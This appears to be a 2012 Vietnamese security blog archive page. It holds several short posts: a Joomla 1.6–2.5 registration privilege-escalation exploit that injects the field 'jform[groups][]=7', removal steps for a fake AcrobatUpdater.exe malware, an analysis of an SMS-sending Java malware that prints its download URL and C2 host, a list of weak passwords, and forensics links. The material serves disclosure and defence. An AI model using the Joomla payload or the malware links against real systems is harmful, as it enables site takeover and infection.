Posts

Showing posts from June, 2012

[Bug] Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

Image
Firebug: <input name="jform[groups][]" value="7" /> Tamper Data: jform[groups][]=7 Chi tiết index.php?option=com_users&view=registration (2.x) index.php?option=com_user&view=register (Joomla! 1.x) 1. go to mydomain + index.php?option=com_users&view=registration 2. The first time I enter de pass incorrect. 3. The second time y insert with firebug after " .

[Diệt] Malware STL | d517e448e15f3ea3b0405b7679eccfd7 | AcrobatUpdater.exe

Image
Dành cho bạn nào thắc mắc về việc làm sao xoá con malware này. Hãy tìm trong C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau: 1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra. 2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe . 3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm. 4. Xoá nó ngay. 5. Vào registry và xoá các key sau: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Volatile Environment] CURRENT = "2011-07-20 16:28:52" DATA = 5D 4C 3C 3D 3F 4B 57

[Forensic] Window 8 forensic

Image
Some good reading to get started (props to the researchers): http://propellerheadforensics.files.wordpress.com/2012/05/thomson_windows-8-forensic-guide2.pdf http://computerforensics.champlain.edu/blog/windows-8-forensics http://dfstream.blogspot.com/2012/05/windows-8-typedurlstime.html https://www.sans.org/webcasts/windows-8-forensics-filehistory-service-95325 http://randomthoughtsofforensics.blogspot.com/2011/12/windows-8-forensic-overview.html

[TOP] 25 mã PIN và mật khẩu PASSWORD tệ nhất

Image
Password | Mật khẩu password 123456 12345678 1234 qwerty 12345 dragon pussy baseball football letmein monkey 696969 abc123 mustang michael shadow master jennifer 111111 2000 jordan superman harley 1234567 PIN 1234 0000 2580 1111 5555 5683 0852 2222 1212 1998 6969 1379 1997 2468 9999 7777 1996 2011 3333 1999 8888 1995 2525 1590 1235

[Phân tích] http://210.211.100.170/g/l9.jar TQN

Image
1 post của anh TQN trên facebook Từ khóa "Sexy NgocTrinh>>Chi danh cho 18+. Tai MienPhi: http://210.211.100.170/g/l9.jar" Phân tích Trưa này, wget nó về thử xem sao. Dùng 7z unjar nó, DJ Java Decompiler để decompiler. Hì hì, hình như một dạng SMS spy. Vì code đt tui không rành lắm, post lên cho bà con chỉ giáo: private final String MIDLET_CLASS_NAME = "GameMidlet"; private static final String SMS_CONNECTION_URL = "sms://:5678"; private static final String ALLOWED_SENDER_FILTER = "*"; .... public void run() { if(sendSms(h3.SMS_NUMBER, h3.SMS_CODE)) try { rc = RecordStore.openRecordStore(h3.RC_CODE, true); sRecord(rc, 1); rc.closeRecordStore(); } ...... socket://dzanchoi.vn:9002 ........ Em đề nghị cơ quan có chức năn tìm ngay chủ nhân của cái IP 210.211.100.170 và dzanchoi.vn, mời nó đi ăn cơm miễn phí, mặc áo Juventus cho vui. Bổ sung Làm được gì ? :))

[Lượm] Tài năng tuổi teen trong giới công nghệ

Image
Những tài năng tuổi teen trong giới công nghệ Trong số đó có những cậu bé chỉ mới đang học tiểu học nhưng đã có thể viết hàng nghìn dòng mã để lập trình ứng dụng trên các nền tảng nổi tiếng như iOS và Android. Mới học lớp 8, Robert Nay ở Utah (Mỹ) đã viết hơn 4.000 dòng mã cho game Bubble Ball và thu hút 2 triệu lượt tải chỉ sau 2 tuần đầu năm 2011. Cậu còn sở hữu công ty riêng mang tên Nay Games. Sahil Lavingia , người Mỹ gốc Ấn, đang được coi là chàng trai tuổi teen đáng chú ý nhất thung lũng Silicon. Bằng việc thiết kế website, từ năm 15 tuổi, Lavingia đã độc lập về tài chính và tài khoản ngân hàng luôn có hơn 100.000 USD. Năm 17 tuổi, cậu là một trong những thành viên đầu tiên của mạng xã hội ảnh Pinterest. Còn hiện nay, hotboy 19 tuổi này đã thu hút được vài triệu USD cho dự án bán hàng qua mạng Gumroad của mình. Từ năm 2009 khi mới 9 tuổi và học lớp 4, cậu bé Lim Ding Wen người Singapore đã hoàn thành 20 dự án lập trình, trong đó có ứng dụng tập vẽ D